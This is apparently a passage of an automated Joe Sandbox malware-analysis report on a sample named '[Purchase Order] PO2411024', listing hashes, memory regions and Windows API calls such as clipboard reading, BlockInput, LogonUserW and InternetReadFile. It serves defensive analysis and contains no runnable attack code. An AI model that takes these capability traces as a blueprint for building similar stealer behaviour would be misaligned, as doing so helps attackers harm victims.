                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                    • String ID: .lnk
                                                    • API String ID: 886957087-24824748
                                                    • Opcode ID: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                    • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                    • Opcode Fuzzy Hash: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                    • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                    APIs
                                                    • OpenClipboard.USER32(?), ref: 0046DCE7
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                    • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                    • CloseClipboard.USER32 ref: 0046DD0D
                                                    • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                    • CloseClipboard.USER32 ref: 0046DD41
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                    • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                    • CloseClipboard.USER32 ref: 0046DD99
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                    • String ID:
                                                    • API String ID: 15083398-0
                                                    • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                    • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                    • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                    • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: U$\
                                                    • API String ID: 4104443479-100911408
                                                    • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                    • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                    • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                    • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 3541575487-0
                                                    • Opcode ID: eae3f5a3b7237ff41c3bf9ab8d31e2e7de6a625c8a14a51f6d4c2f6ae7e73f22
                                                    • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                    • Opcode Fuzzy Hash: eae3f5a3b7237ff41c3bf9ab8d31e2e7de6a625c8a14a51f6d4c2f6ae7e73f22
                                                    • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                    • String ID:
                                                    • API String ID: 901099227-0
                                                    • Opcode ID: 99bb4a73de44f304a5cce5e58a3439d416e34362a59387e6d0e16870e0ee9fb1
                                                    • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                    • Opcode Fuzzy Hash: 99bb4a73de44f304a5cce5e58a3439d416e34362a59387e6d0e16870e0ee9fb1
                                                    • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                    APIs
                                                    • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Proc
                                                    • String ID:
                                                    • API String ID: 2346855178-0
                                                    • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                    • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                    • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                    • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                    APIs
                                                    • BlockInput.USER32(00000001), ref: 0045A38B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: BlockInput
                                                    • String ID:
                                                    • API String ID: 3456056419-0
                                                    • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                    • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                    • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                    • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                    APIs
                                                    • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: LogonUser
                                                    • String ID:
                                                    • API String ID: 1244722697-0
                                                    • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                    • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                    • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                    • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                    APIs
                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                    • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                    • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                    • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                    • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                    • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                    • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N@
                                                    • API String ID: 0-1509896676
                                                    • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                    • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                    • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                    • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                    • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                    • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                    • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                    • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                    • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                    • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                    • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                    • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                    • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                    • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                    • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                    • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501711189.0000000003970000.00000040.00000020.00020000.00000000.sdmp, Offset: 03970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3970000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                    • Instruction ID: 570dcbeb8c42fc16f1ca22df7357faf1e73cf601c798be25e002e2e525419057
                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                    • Instruction Fuzzy Hash: 3A41C171D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501711189.0000000003970000.00000040.00000020.00020000.00000000.sdmp, Offset: 03970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3970000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                    • Instruction ID: 2b41c83b6d1fe2e42835e3df86ba631b1f365584772b42856a8789bd910b41a7
                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                    • Instruction Fuzzy Hash: 1E019D78A10209EFCB44DF98C5909AEF7F9FB88310F208699E819A7741D730AE41DB80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501711189.0000000003970000.00000040.00000020.00020000.00000000.sdmp, Offset: 03970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3970000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                    • Instruction ID: 0e46494f42feb80d07473bdbfbca14ca23732696244e6356ea8e45cb80191149
                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                    • Instruction Fuzzy Hash: EC019278A00209EFCB48DF98C5909AEF7F9FB48310F208599D809A7741D730AE41EB80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501711189.0000000003970000.00000040.00000020.00020000.00000000.sdmp, Offset: 03970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3970000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                    APIs
                                                    • DeleteObject.GDI32(?), ref: 0045953B
                                                    • DeleteObject.GDI32(?), ref: 00459551
                                                    • DestroyWindow.USER32(?), ref: 00459563
                                                    • GetDesktopWindow.USER32 ref: 00459581
                                                    • GetWindowRect.USER32(00000000), ref: 00459588
                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                    • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                    • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                    • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
